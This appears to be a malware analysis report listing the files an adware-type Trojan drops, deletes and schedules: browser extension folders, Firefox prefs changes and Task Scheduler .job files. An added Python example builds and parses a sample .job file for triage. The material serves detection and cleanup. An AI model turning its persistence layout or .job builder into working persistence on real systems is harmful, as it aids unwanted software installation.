C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\mr\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ru\messages.json (262 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pl\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\arrow.png (332 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon64.png (3 bytes)
%Program Files%\thzXuJvjU\ZzB5QsG.dll (241 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\mk\messages.json (194 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.xul (463 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon48.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\background.js (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ar\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\da\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\main.css (672 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\et\messages.json (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\nl\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon19.png (815 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ca\messages.json (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\bg\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pl\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\vi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fa\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sq\messages.json (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hu\messages.json (156 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\kn\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\lt\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\background.png (109 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\background.js (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\no\messages.json (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt_PT\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt_BR\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\es\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ml\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fa\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sk\messages.json (143 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\saved-telemetry-pingsgjghbrkfyg (0 bytes)

The process schtasks.exe:1084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Tasks\uuxHwpnMkRCRpJh.job (274 bytes)

The process schtasks.exe:3636 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Tasks\bku3654992853611870.job (462 bytes)

The process schtasks.exe:3944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Tasks\uuxHwpnMkRCRpJh.job (272 bytes)

The process schtasks.exe:1720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Tasks\bku2343520322592297.job (468 bytes)
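
The four schtasks.exe invocations above leave Task Scheduler 1.0 .job files in C:\Windows\Tasks, which is where this sample keeps its persistence. The report lists only the file names and sizes, so the following added example (not part of the Lavasoft report and not code from the sample) builds a constructed .job file and parses it using the MS-TSCH layout: a 68-byte fixed header, counted UTF-16LE strings for the command line, and 48-byte trigger records. The command path, author and trigger times in the sample are hypothetical. Pointing parse_job at the real files from C:\Windows\Tasks shows what they launch and when, which is the first question to answer before deleting them.

```python
import struct
import uuid

# Layout from MS-TSCH (Task Scheduler 1.0 .JOB files): a 68-byte fixed section
# followed by a variable-length section of counted UTF-16LE strings and triggers.
FIXED_FMT = "<HH16sHHHHHHIIIII16s"      # 68 bytes
TRIGGER_FMT = "<HHHHHHHHHHIIIIHHHHHH"   # 48 bytes per trigger
TRIGGER_TYPES = {0: "ONCE", 1: "DAILY", 2: "WEEKLY", 3: "MONTHLYDATE",
                 4: "MONTHLYDOW", 5: "ON_IDLE", 6: "AT_SYSTEMSTART", 7: "AT_LOGON"}
# Directories a scheduled task's binary should not normally live in.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\programdata\\")


def _ustr(s):
    """Counted string: WCHAR count including the NUL, then UTF-16LE chars (count 0 = empty)."""
    if not s:
        return struct.pack("<H", 0)
    return struct.pack("<H", len(s) + 1) + (s + "\x00").encode("utf-16-le")


def _read_ustr(data, pos):
    count = struct.unpack_from("<H", data, pos)[0]
    pos += 2
    if count == 0:
        return "", pos
    text = data[pos:pos + 2 * count].decode("utf-16-le").rstrip("\x00")
    return text, pos + 2 * count


def make_trigger(ttype, year, month, day, hour, minute, interval_min=0):
    """One TRIGGER record; interval_min is the repeat interval ('Minutes Interval')."""
    return struct.pack(TRIGGER_FMT, 48, 0, year, month, day, 0, 0, 0, hour, minute,
                       0, interval_min, 0, ttype, 0, 0, 0, 0, 0, 0)


def build_job(app, params, workdir, author, comment, triggers):
    """Serialize a .job file (used here only to construct the sample)."""
    var = struct.pack("<H", 0)                       # running instance count
    app_name_offset = 68 + len(var)
    for s in (app, params, workdir, author, comment):
        var += _ustr(s)
    var += struct.pack("<HH", 0, 0)                  # user data size, reserved data size
    trigger_offset = 68 + len(var)
    var += struct.pack("<H", len(triggers)) + b"".join(triggers)
    fixed = struct.pack(FIXED_FMT, 0x0500, 1, uuid.uuid4().bytes_le,
                        app_name_offset, trigger_offset, 0, 0, 0, 0,
                        0x20, 72 * 3600 * 1000, 0, 0, 0, b"\x00" * 16)
    return fixed + var


def parse_job(data):
    """Extract the fields a triage pass cares about from a .job file."""
    f = struct.unpack_from(FIXED_FMT, data, 0)
    job = {"uuid": str(uuid.UUID(bytes_le=f[2])), "status": f[12], "flags": f[13]}
    pos = f[3]                                       # Application Name length offset
    for name in ("application", "parameters", "working_dir", "author", "comment"):
        job[name], pos = _read_ustr(data, pos)
    tpos = f[4]                                      # Trigger offset
    count = struct.unpack_from("<H", data, tpos)[0]
    job["triggers"] = []
    for i in range(count):
        t = struct.unpack_from(TRIGGER_FMT, data, tpos + 2 + 48 * i)
        job["triggers"].append({
            "type": TRIGGER_TYPES.get(t[13], "UNKNOWN(%d)" % t[13]),
            "begin": "%04d-%02d-%02d %02d:%02d" % (t[2], t[3], t[4], t[8], t[9]),
            "interval_min": t[11]})
    return job


def runs_from_user_writable(job):
    """True when the task's binary lives in a directory any user can write to."""
    app = job["application"].lower()
    return any(d in app for d in USER_WRITABLE)


# Constructed sample: the report records only the .job file names and sizes,
# not their contents. Paths, author and times below are hypothetical.
SAMPLE_APP = "C:\\Users\\user\\AppData\\Local\\Temp\\example_updater.exe"
SAMPLE_JOB = build_job(SAMPLE_APP, "/silent", "C:\\Users\\user\\AppData\\Local\\Temp",
                       "user", "", [make_trigger(1, 2017, 8, 3, 14, 51, 60),
                                    make_trigger(7, 2017, 8, 3, 0, 0)])

if __name__ == "__main__":
    job = parse_job(SAMPLE_JOB)
    print(job["application"], job["parameters"])
    for t in job["triggers"]:
        print("  trigger %(type)s from %(begin)s every %(interval_min)d min" % t)
    print("runs from user-writable dir:", runs_from_user_writable(job))
```

The .job format predates the XML task definitions under C:\Windows\System32\Tasks; on Windows 7 both exist, so a triage pass should enumerate both locations. A task whose binary sits under a user-writable directory, as runs_from_user_writable flags, is a strong indicator when it appears alongside the dropped files listed in this report.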

The process sdfCF40.exe:2912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_334.exe (250065 bytes)

The process Setup.exe:2448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sdfCF40.exe (644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\SilentInstaller_dotnet4[1].exe (150385 bytes)

The process Setup.exe:4028 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\amipb[1].js (32188 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\index[1].htm (1133 bytes)

The process starter.exe:3588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\InstallationConfiguration.xml (2242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\installer.dat (667 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\po.db (1 byte)

The process ytab_m_1_big.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ms\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\tr\messages.json (141 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\cs\messages.json (144 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\te\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_PT\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sw\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ml\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\he\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\kn\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\da\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fil\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\gu\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.html (77 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\th\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\am\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales (8 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ru\messages.json (262 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pl\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\arrow.png (332 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ro\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sq\messages.json (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (13017 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon64.png (3 bytes)
%Program Files%\thzXuJvjU\ZzB5QsG.dll (241 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.xul (463 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon48.png (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\vi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bg\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\main.css (672 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ta\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\et\messages.json (127 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fr\messages.json (190 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hr\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome (4 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\icons\icon19.png (815 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lv\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ca\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\it\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\styles.css (263 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fi\messages.json (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js_temp (776 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\el\messages.json (197 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_GB\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.xml (1 byte)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\id\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_BR\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\de\messages.json (157 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\install.rdf (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fa\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ar\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sr\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\foreground.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ko\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\bootstrap.js (15 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hu\messages.json (156 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\nl\messages.json (153 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_US\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_CN\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\be\messages.json (204 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\background.png (109 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sv\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mr\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\background.js (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\no\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\Kernel.js (38 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mk\messages.json (194 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es_419\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\uk\messages.json (198 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sl\messages.json (138 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bn\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt\messages.json (161 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ja\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.css (1 byte)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_TW\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi (4 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lt\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sk\messages.json (143 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome.manifest (78 bytes)

The Trojan deletes the following file(s):

%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\vi\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome.manifest (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\id\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hu\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\bg (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\be (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\background.html (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pl\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\arrow.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\bn (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en_GB (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt_PT (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ja (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sk (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sv\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\lt\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\lv\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\es_419 (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ar (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\id (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pl (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\kn\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\am (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\it (0 bytes)
%Program Files%\thzXuJvjUgjghbrkfyg (0 bytes)
